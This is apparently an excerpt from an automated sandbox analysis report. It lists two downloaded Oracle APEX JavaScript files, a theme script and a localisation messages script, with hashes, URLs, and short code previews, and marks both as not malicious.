                                                                          Entropy (8bit):5.3015355211376285
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:D263006666672F790591AAC7F5BC4486
                                                                          SHA1:7F636777876E6AAED1DED9F9D79D3A5A2C4D93AA
                                                                          SHA-256:FFED80156F1BA30F5B6B7EAA9765CC29E7CA803EFDB54032CFCDDB2AD7EDD69A
                                                                          SHA-512:F44A92B09465B8A01AAABD0B49AA3206CD9C46A3F6195D1F1D7A0CA8D912484D4084B311132F81161E5841A9FBD5E6860D7201839ABDA050720428E77C840BDC
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://static.oracle.com/cdn/apex/24.2.2/themes/theme_42/24.2/js/theme42.min.js?v=24.2.2
                                                                          Preview:/*!. Copyright (c) 2014, 2024, Oracle and/or its affiliates.. */.apex.theme42={},function(e,t,n,a,i){"use strict";const o="theme42preload",s="theme42ready",l="theme42layoutchanged",r="apexwindowresized",d="apexreadyend",c="resize",u="forceresize",p=apex.ToggleCore;let f=e(window),g=e(document),h=e("body"),v=apex.gPageContext$,m=e("#t_Header"),x=e("#t_Footer"),C=e(".t-Body-main"),b=e("#t_Body_title"),y=e("#t_TreeNav"),w=e("#t_PageBody"),T=e("#t_Body_content"),k=e("#t_Body_side"),S=e("#t_Body_actions"),j=h.hasClass("t-PageBody--scrollTitle"),B=h.hasClass("t-PageBody--scrollAll"),E=e(".t-Body-info .apex-rds-container"),R="hidden";const P=getComputedStyle(document.documentElement),H="/px|em|rem/gi",I={hidden:!0,icon:!1};let z=parseInt(P.getPropertyValue("--js-mq-xs").replace(H,""),10)||480,M=parseInt(P.getPropertyValue("--js-mq-sm").replace(H,""),10)||640,_=parseInt(P.getPropertyValue("--js-mq-md").replace(H,""),10)||768,L=parseInt(P.getPropertyValue("--js-mq-lg").replace(H,""),10)||1200;t
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1567)
                                                                          Category:downloaded
                                                                          Size (bytes):47030
                                                                          Entropy (8bit):5.504254825485189
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:567E233BBEF72952FCBADD1D7EBE3DC7
                                                                          SHA1:30C577406BD9BE8F94356E914D43207F7FC4FBA8
                                                                          SHA-256:74E7DA0EC9ABAAD880DD7B0DDE9603C1C9A04E12A58FEDEBEDD9F41D1E97AF5E
                                                                          SHA-512:571B46BE51C873E1331AEC85A948656029012BA8DD0BD0D6FCD7C40A91FEC0446A1382B025CEAA2939851ECE4A497313554D00964A47B68DA8AB1AF71B9032DA
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://apex.oracle.com/pls/apex/wwv_flow.js_messages?p_app_id=254038&p_lang=en&p_version=24.2.2-15618029960919&p_nls_settings=eyJudW1lcmljQ2hhcmFjdGVycyI6Ii4sIiwiY3VycmVuY3kiOiIkIiwiaXNvQ3VycmVuY3kiOiJBTUVSSUNBIiwiZHVhbEN1cnJlbmN5IjoiJCJ9
                                                                          Preview:apex.lang.addMessages({."APEX.PROCESSING":"Processing".,"APEX.RADIO.VISUALLY_HIDDEN_RADIO":"Visually hidden radio button".,"APEX.RECORD_VIEW.TOOLBAR":"Single Row View".,"APEX.RICH_TEXT_EDITOR.ACCESSIBLE_LABEL":"\u00250, rich text editor".,"APEX.RTE.READ_ONLY_RICH_TEXT_EDITOR":"Read Only Rich Text Editor".,"APEX.RTE.RICH_TEXT_EDITOR":"Rich Text Editor".,"APEX.RTE.TOOLBAR_ALIGNMENT":"Alignment".,"APEX.RTE.TOOLBAR_EXTRAS":"Extras".,"APEX.RTE.TOOLBAR_FONT":"Font".,"APEX.RTE.TOOLBAR_FORMATTING":"Formatting".,"APEX.RTE.TOOLBAR_LISTS":"Lists".,"APEX.RV.DELETE":"Delete".,"APEX.RV.DUPLICATE":"Duplicate".,"APEX.RV.EXCLUDE_HIDDEN":"Displayed Columns".,"APEX.RV.EXCLUDE_NULL":"Exclude Null Values".,"APEX.RV.INSERT":"Add".,"APEX.RV.MOVE_DOWN":"Move Down".,"APEX.RV.MOVE_UP":"Move Up".,"APEX.RV.NEXT_RECORD":"Next".,"APEX.RV.NOT_GROUPED_LABEL":"Other Columns".,"APEX.RV.PREV_RECORD":"Previous".,"APEX.RV.REC_X":"Row \u00250".,"APEX.RV.REC_XY":"Row \u00250 of \u00251".,"APEX.RV.REFRESH":"Refresh".,"APEX.R
                                                                          No static file info